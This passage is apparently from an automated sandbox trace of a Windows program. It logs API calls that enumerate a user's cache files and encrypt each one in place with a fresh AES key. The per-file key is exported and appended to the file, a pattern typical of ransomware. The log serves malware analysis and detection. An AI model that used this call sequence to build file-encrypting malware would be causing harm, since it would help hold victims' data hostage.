flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.292] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", dwFileAttributes=0x80) returned 1 [0144.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.293] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1419) returned 1 [0144.293] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1419) returned 1 [0144.293] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x469, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.293] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.295] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.295] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.295] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.295] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.295] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x58b, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x58b, lpOverlapped=0x0) returned 1 [0144.295] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.295] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x58b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x590) returned 1 [0144.295] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.295] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x590, lpOverlapped=0x0) returned 1 [0144.295] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.295] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.295] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.295] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.295] CloseHandle (hObject=0x198) returned 1 [0144.311] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.315] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.316] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.316] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", dwFileAttributes=0x80) returned 1 [0144.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.318] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=2920) returned 1 [0144.318] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=2920) returned 1 [0144.318] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xa46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.318] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.319] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.319] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.319] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.319] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.319] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb68, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xb68, lpOverlapped=0x0) returned 1 [0144.319] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.320] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xb68, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xb70) returned 1 [0144.320] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.320] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xb70, lpOverlapped=0x0) returned 1 [0144.320] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.320] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.320] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.320] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.320] CloseHandle (hObject=0x198) returned 1 [0144.336] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.341] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.341] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.341] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.341] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.341] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", dwFileAttributes=0x80) returned 1 [0144.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.342] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=471) returned 1 [0144.342] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=471) returned 1 [0144.342] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.342] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.343] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.343] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.343] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d7, lpOverlapped=0x0) returned 1 [0144.343] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.343] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0144.343] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.343] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0144.343] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.343] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.344] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.344] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.344] CloseHandle (hObject=0x198) returned 1 [0144.360] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.364] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.364] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.364] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", dwFileAttributes=0x80) returned 1 [0144.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.365] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1664) returned 1 [0144.365] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1664) returned 1 [0144.365] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x55e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.365] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.366] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.366] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.366] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.367] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.367] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x680, lpOverlapped=0x0) returned 1 [0144.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x680, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x690) returned 1 [0144.367] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.367] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x690, lpOverlapped=0x0) returned 1 [0144.367] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.367] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.367] CloseHandle (hObject=0x198) returned 1 [0144.393] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.397] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.397] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.397] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.397] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.398] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", dwFileAttributes=0x80) returned 1 [0144.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.399] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=727) returned 1 [0144.399] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=727) returned 1 [0144.399] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.399] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.400] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.400] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.400] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.400] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.400] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x2d7, lpOverlapped=0x0) returned 1 [0144.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.400] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2e0) returned 1 [0144.400] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.400] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x2e0, lpOverlapped=0x0) returned 1 [0144.400] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.401] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.401] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.401] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.401] CloseHandle (hObject=0x198) returned 1 [0144.417] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.421] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.421] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.421] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", dwFileAttributes=0x80) returned 1 [0144.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.422] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=727) returned 1 [0144.422] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=727) returned 1 [0144.422] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.422] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.423] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.423] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.423] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.423] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.423] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x2d7, lpOverlapped=0x0) returned 1 [0144.424] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.424] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, 